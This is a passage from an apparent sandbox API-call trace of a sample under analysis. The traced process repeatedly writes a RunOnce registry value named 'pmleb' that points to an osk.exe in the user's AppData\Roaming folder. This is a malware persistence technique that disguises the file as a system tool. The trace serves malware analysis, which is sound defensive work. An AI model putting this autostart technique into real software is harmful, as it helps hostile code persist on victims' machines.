rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.080] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.080] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.080] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.080] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.080] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.080] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.080] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x20 
[0081.080] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.080] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x21 [0081.080] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.081] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x20 [0081.081] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.081] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.081] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.081] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.081] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.082] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.082] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.082] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.082] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.082] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.082] RegCloseKey (hKey=0x280) returned 0x0 [0081.082] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.082] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.082] SetTimer (hWnd=0x20280, nIDEvent=0x209c, uElapse=0xa, lpTimerFunc=0x0) returned 0x209c [0081.083] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.094] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.094] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.094] KillTimer (hWnd=0x20280, uIDEvent=0x209c) returned 1 [0081.095] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.095] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.095] IUnknown:Release (This=0x787518) returned 0x1 [0081.095] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.095] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.095] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.095] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.095] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.096] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x21 [0081.096] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.096] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x22 [0081.096] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.097] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x21 [0081.097] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.097] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.097] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.097] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.097] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.097] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.097] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.097] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.097] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.098] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.098] RegCloseKey (hKey=0x280) returned 0x0 [0081.098] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.098] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.098] SetTimer (hWnd=0x20280, nIDEvent=0x209d, uElapse=0xa, lpTimerFunc=0x0) returned 0x209d [0081.098] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.110] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.110] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.110] KillTimer (hWnd=0x20280, uIDEvent=0x209d) returned 1 [0081.110] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.110] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.110] IUnknown:Release (This=0x787518) returned 0x1 [0081.111] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.111] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.111] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.111] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.111] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.111] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.111] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.111] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.111] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.111] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x22 [0081.111] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0081.111] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x23 [0081.111] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.112] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x22 [0081.112] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.112] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.112] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.113] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.113] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.113] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.113] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.113] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.113] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.113] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.113] RegCloseKey (hKey=0x280) returned 0x0 [0081.113] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.114] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.114] SetTimer (hWnd=0x20280, nIDEvent=0x209e, uElapse=0xa, lpTimerFunc=0x0) returned 0x209e [0081.114] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.139] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0081.139] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.139] KillTimer (hWnd=0x20280, uIDEvent=0x209e) returned 1 [0081.140] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.140] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.140] IUnknown:Release (This=0x787518) returned 0x1 [0081.140] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.140] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.140] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 